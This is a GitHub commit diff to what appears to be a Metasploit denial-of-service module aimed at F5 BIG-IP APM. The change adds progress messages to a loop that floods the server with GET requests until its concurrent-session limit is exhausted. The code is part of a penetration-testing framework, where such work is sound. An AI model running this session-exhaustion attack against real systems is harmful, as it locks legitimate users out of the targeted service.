We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7e62ba8 commit 5588ad3Copy full SHA for 5588ad3
modules/auxiliary/dos/http/f5_bigip_apm_max_sessions.rb
@@ -70,7 +70,10 @@ def run
70
print_status("#{peer} - Starting DoS attack")
71
72
# Start attack
73
- limit.times do
+ limit.times do |step|
74
+ if step % 100 == 0
75
+ print_status("#{peer} - #{step * 100 / limit}% accomplished...")
76
+ end
77
res = send_request_cgi('method' => 'GET', 'uri' => '/')
78
if res && res.headers['Location'] =~ /\/my\.logout\.php3\?errorcode=14/
79
print_good("#{peer} - DoS accomplished: The maximum number of concurrent user sessions has been reached.")
0 commit comments